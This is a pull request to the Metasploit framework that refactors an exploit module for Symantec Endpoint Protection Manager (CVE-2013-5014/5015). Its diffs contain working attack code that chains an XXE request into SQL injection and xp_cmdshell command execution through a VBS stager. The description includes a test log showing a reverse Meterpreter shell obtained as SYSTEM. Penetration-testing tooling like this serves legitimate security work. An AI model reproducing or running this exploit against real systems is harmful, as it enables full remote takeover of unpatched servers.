### PR TITLE
Clean up symantec module

### DIFF
--- a/modules/exploits/windows/http/symantec_endpoint_manager_rce.rb
+++ b/modules/exploits/windows/http/symantec_endpoint_manager_rce.rb
@@ -18,9 +18,10 @@ class Metasploit3 < Msf::Exploit::Remote
         This module exploits XXE and SQL injection flaws in Symantec Endpoint Protection Manager
         versions 11.0, 12.0 and 12.1.
         When supplying a specially crafted XXE request to '/servlet/ConsoleServlet?ActionType=ConsoleLog', an
-        attacker can request the 'http://127.0.0.1:9090/servlet/ConsoleServlet' url by injecting arbitrary SQL
-        statements into the 'Parameter' parameter. As xp_cmdshell is enabled in the included database instance,
-        it's possible to execute arbitrary system commands on the remote system with SYSTEM privileges.
+        attacker can request the 'http://127.0.0.1:9090/servlet/ConsoleServlet' url. By injecting arbitrary SQL
+        statements into the 'Parameter' parameter further database access is possible. As xp_cmdshell is
+        enabled in the included database instance, it's possible to execute arbitrary system commands on the
+        remote system with SYSTEM privileges.
       },
       'Author'         =>
         [

--- a/modules/exploits/windows/http/symantec_endpoint_manager_rce.rb
+++ b/modules/exploits/windows/http/symantec_endpoint_manager_rce.rb
@@ -1,0 +1,138 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::CmdStagerVBS
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Symantec Endpoint Protection Manager Remote Command Execution',
+      'Description'    => %q{
+        This module exploits XXE and SQL injection flaws in Symantec Endpoint Protection Manager
+        versions 11.0, 12.0 and 12.1.
+        When supplying a specially crafted XXE request to '/servlet/ConsoleServlet?ActionType=ConsoleLog', an
+        attacker can request the 'http://127.0.0.1:9090/servlet/ConsoleServlet' url by injecting arbitrary SQL
+        statements into the 'Parameter' parameter. As xp_cmdshell is enabled in the included database instance,
+        it's possible to execute arbitrary system commands on the remote system with SYSTEM privileges.
+      },
+      'Author'         =>
+        [
+          'Stefan Viehbock', # Discovery
+          'Chris Graham', # PoC exploit
+          'xistence <xistence[at]0x90.nl>' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt' ],
+          [ 'EDB', '31853'],
+          [ 'CVE', '2013-5014' ],
+          [ 'CVE', '2013-5015' ]
+        ],
+      'Targets'	=>
+        [
+          [ 'Windows Universal',
+            {
+              'Arch' => ARCH_X86,
+              'Platform' => 'win'
+            }
+          ]
+        ],
+      'Privileged' => true,
+      'Platform' => 'win',
+      'DisclosureDate' => 'Feb 24 2014',
+      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        Opt::RPORT(9090),
+        OptBool.new('SSL',   [ true, 'Use SSL', false ]),
+        OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
+      ], self.class)
+  end
+
+
+  def check
+    res = send_request_cgi(
+      {
+        'uri'   =>  normalize_uri(target_uri.path),
+        'method' => 'GET',
+      })
+
+    if res and res.code == 200 and res.body =~ /Symantec Endpoint Protection Manager/ and res.body =~ /1995 - 2013 Symantec Corporation/
+      return Exploit::CheckCode::Appears
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def windows_stager
+
+    # Random exe name
+    exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
+    print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending payload")
+    # Execute the cmdstager, max length of the commands is ~3950
+    execute_cmdstager({:linemax => 3950})
+
+  end
+
+  def execute_command(cmd, opts = {})
+
+    # Convert the command data to hex, so we can use that in the xp_cmdshell. Else characters like '>' will be harder to bypass in the XML.
+    command = "0x#{Rex::Text.to_hex("cmd /c #{cmd}", '')}"
+
+    # Generate random 'xx032xxxx' sequence number.
+    seqnum = "#{rand_text_numeric(2)}032#{rand_text_numeric(4)}"
+
+    soap = %Q|<?xml version=\"1.0\" encoding=\"UTF-8\"?>
+<!DOCTYPE sepm [<!ENTITY payload SYSTEM \"http://127.0.0.1:9090/servlet/ConsoleServlet?ActionType=ConfigServer&action=test_av&SequenceNum=#{seqnum}&Parameter=';call xp_cmdshell(#{command});--\" >]>
+<request>
+<xxe>&payload;</xxe>
+</request>|
+
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(soap, "text/xml", nil, "form-data; name=\"Content\"")
+    xxe = post_data.to_s
+
+    res = send_request_cgi(
+      {
+        'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
+        'method' => 'POST',
+        'vars_get' => { 'ActionType' => 'ConsoleLog' },
+        'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
+        'data' => xxe,
+      })
+
+    if res and res.body !~ /ResponseCode/
+        fail_with(Failure::Unknown, "#{datastore['RHOST']}:#{datastore['RPORT']} - Something went wrong.")
+    end
+
+  end
+
+  def exploit
+
+    if not datastore['CMD'].empty?
+      print_status("Executing command '#{datastore['CMD']}'")
+      execute_command(datastore['CMD'])
+      return
+    end
+
+    case target['Platform']
+      when 'win'
+        windows_stager
+      else
+        fail_with(Failure::Unknown, 'Target not supported.')
+    end
+
+    handler
+
+  end
+end
+

--- a/modules/exploits/windows/http/symantec_endpoint_manager_rce.rb
+++ b/modules/exploits/windows/http/symantec_endpoint_manager_rce.rb
@@ -4,10 +4,12 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/powershell'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
+  include REXML
   include Msf::Exploit::CmdStagerVBS
   include Msf::Exploit::Remote::HttpClient
 
@@ -16,12 +18,10 @@ class Metasploit3 < Msf::Exploit::Remote
       'Name'           => 'Symantec Endpoint Protection Manager Remote Command Execution',
       'Description'    => %q{
         This module exploits XXE and SQL injection flaws in Symantec Endpoint Protection Manager
-        versions 11.0, 12.0 and 12.1.
-        When supplying a specially crafted XXE request to '/servlet/ConsoleServlet?ActionType=ConsoleLog', an
-        attacker can request the 'http://127.0.0.1:9090/servlet/ConsoleServlet' url. By injecting arbitrary SQL
-        statements into the 'Parameter' parameter further database access is possible. As xp_cmdshell is
-        enabled in the included database instance, it's possible to execute arbitrary system commands on the
-        remote system with SYSTEM privileges.
+        versions 11.0, 12.0 and 12.1. When supplying a specially crafted XXE request an attacker
+        can reach SQL injection affected components. As xp_cmdshell is enabled in the included
+        database instance, it's possible to execute arbitrary system commands on the remote system
+        with SYSTEM privileges.
       },
       'Author'         =>
         [
@@ -32,33 +32,27 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          [ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt' ],
-          [ 'EDB', '31853'],
           [ 'CVE', '2013-5014' ],
-          [ 'CVE', '2013-5015' ]
+          [ 'CVE', '2013-5015' ],
+          [ 'EDB', '31853'],
+          [ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt' ]
         ],
-      'Targets'	=>
+      'Arch'           => ARCH_X86,
+      'Platform'       => 'win',
+      'Targets'        =>
         [
-          [ 'Windows Universal',
-            {
-              'Arch' => ARCH_X86,
-              'Platform' => 'win'
-            }
-          ]
+          ['Windows VBS Stager', {}]
         ],
-      'Privileged' => true,
-      'Platform' => 'win',
+      'Privileged'     => true,
       'DisclosureDate' => 'Feb 24 2014',
-      'DefaultTarget' => 0))
+      'DefaultTarget'  => 0))
 
     register_options(
       [
         Opt::RPORT(9090),
-        OptBool.new('SSL',   [ true, 'Use SSL', false ]),
-        OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
+        OptString.new('TARGETURI', [true, 'The base path', '/'])
       ], self.class)
   end
-
 
   def check
     res = send_request_cgi(
@@ -67,36 +61,27 @@ class Metasploit3 < Msf::Exploit::Remote
         'method' => 'GET',
       })
 
-    if res and res.code == 200 and res.body =~ /Symantec Endpoint Protection Manager/ and res.body =~ /1995 - 2013 Symantec Corporation/
+    if res && res.code == 200 && res.body =~ /Symantec Endpoint Protection Manager/ && res.body =~ /1995 - 2013 Symantec Corporation/
       return Exploit::CheckCode::Appears
     end
 
-    return Exploit::CheckCode::Safe
+    Exploit::CheckCode::Safe
   end
 
-  def windows_stager
-
-    # Random exe name
-    exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
-    print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending payload")
+  def exploit
+    print_status("#{peer} - Sending payload")
     # Execute the cmdstager, max length of the commands is ~3950
     execute_cmdstager({:linemax => 3950})
-
   end
 
   def execute_command(cmd, opts = {})
-
     # Convert the command data to hex, so we can use that in the xp_cmdshell. Else characters like '>' will be harder to bypass in the XML.
     command = "0x#{Rex::Text.to_hex("cmd /c #{cmd}", '')}"
 
     # Generate random 'xx032xxxx' sequence number.
     seqnum = "#{rand_text_numeric(2)}032#{rand_text_numeric(4)}"
 
-    soap = %Q|<?xml version=\"1.0\" encoding=\"UTF-8\"?>
-<!DOCTYPE sepm [<!ENTITY payload SYSTEM \"http://127.0.0.1:9090/servlet/ConsoleServlet?ActionType=ConfigServer&action=test_av&SequenceNum=#{seqnum}&Parameter=';call xp_cmdshell(#{command});--\" >]>
-<request>
-<xxe>&payload;</xxe>
-</request>|
+    soap = soap_request(seqnum, command)
 
     post_data = Rex::MIME::Message.new
     post_data.add_part(soap, "text/xml", nil, "form-data; name=\"Content\"")
@@ -112,28 +97,25 @@ class Metasploit3 < Msf::Exploit::Remote
       })
 
     if res and res.body !~ /ResponseCode/
-        fail_with(Failure::Unknown, "#{datastore['RHOST']}:#{datastore['RPORT']} - Something went wrong.")
+      fail_with(Failure::Unknown, "#{peer} - Something went wrong.")
     end
-
   end
 
-  def exploit
+  def soap_request(seqnum, command)
+    entity = "<!ENTITY payload SYSTEM \"http://127.0.0.1:9090/servlet/ConsoleServlet?ActionType=ConfigServer&action=test_av&SequenceNum=#{seqnum}&Parameter=';call xp_cmdshell(#{command});--\" >"
 
-    if not datastore['CMD'].empty?
-      print_status("Executing command '#{datastore['CMD']}'")
-      execute_command(datastore['CMD'])
-      return
-    end
+    xml = Document.new
+    xml.add(DocType.new('sepm', "[ METASPLOIT ]"))
+    xml.add_element("Request")
+    xxe = xml.root.add_element("xxe")
+    xxe.text = "PAYLOAD"
 
-    case target['Platform']
-      when 'win'
-        windows_stager
-      else
-        fail_with(Failure::Unknown, 'Target not supported.')
-    end
+    xml_s = xml.to_s
+    xml_s.gsub!(/METASPLOIT/, entity) # To avoid html encoding
+    xml_s.gsub!(/PAYLOAD/, "&payload;") # To avoid html encoding
 
-    handler
-
+    xml_s
   end
+
 end
 


### PR DESCRIPTION
Hi @xistence, 

Great module on https://github.com/rapid7/metasploit-framework/pull/3029, thanks a lot! This pull request just tries to clean it with some of the provided feedback in the pull reuquest. Please feel free to check, test,review and land once you feel comfortable, and this module will be ready to go!

And the moment I've deleted the CMD option, if you want to provide the CMD option still, please, add an ARCH_CMD target, as explained by @zeroSteiner, adding the payload analysis necessary (space, badchars).

Tested on win XPSP3 and win7 successfully:

```
msf exploit(symantec_endpoint_manager_rce) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.133:9090 - Sending payload
[*] Command Stager progress -   3.90% done (3949/101355 bytes)
[*] Command Stager progress -   7.79% done (7898/101355 bytes)
[*] Command Stager progress -  11.69% done (11847/101355 bytes)
[*] Command Stager progress -  15.58% done (15796/101355 bytes)
[*] Command Stager progress -  19.48% done (19745/101355 bytes)
[*] Command Stager progress -  23.38% done (23694/101355 bytes)
[*] Command Stager progress -  27.27% done (27643/101355 bytes)
[*] Command Stager progress -  31.17% done (31592/101355 bytes)
[*] Command Stager progress -  35.07% done (35541/101355 bytes)
[*] Command Stager progress -  38.96% done (39490/101355 bytes)
[*] Command Stager progress -  42.86% done (43439/101355 bytes)
[*] Command Stager progress -  46.75% done (47388/101355 bytes)
[*] Command Stager progress -  50.65% done (51337/101355 bytes)
[*] Command Stager progress -  54.55% done (55286/101355 bytes)
[*] Command Stager progress -  58.44% done (59235/101355 bytes)
[*] Command Stager progress -  62.34% done (63184/101355 bytes)
[*] Command Stager progress -  66.24% done (67133/101355 bytes)
[*] Command Stager progress -  70.13% done (71082/101355 bytes)
[*] Command Stager progress -  74.03% done (75031/101355 bytes)
[*] Command Stager progress -  77.92% done (78980/101355 bytes)
[*] Command Stager progress -  81.82% done (82929/101355 bytes)
[*] Command Stager progress -  85.72% done (86878/101355 bytes)
[*] Command Stager progress -  89.61% done (90827/101355 bytes)
[*] Command Stager progress -  93.51% done (94776/101355 bytes)
[*] Command Stager progress -  97.41% done (98725/101355 bytes)
[*] Sending stage (769024 bytes) to 192.168.172.133
[*] Command Stager progress - 100.00% done (101355/101355 bytes)
[*] Meterpreter session 4 opened (192.168.172.1:4444 -> 192.168.172.133:49269) at 2014-02-24 16:00:08 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit -y
[*] Shutting down Meterpreter...

[*] 192.168.172.133 - Meterpreter session 4 closed.  Reason: User exit
msf exploit(symantec_endpoint_manager_rce) > 
```
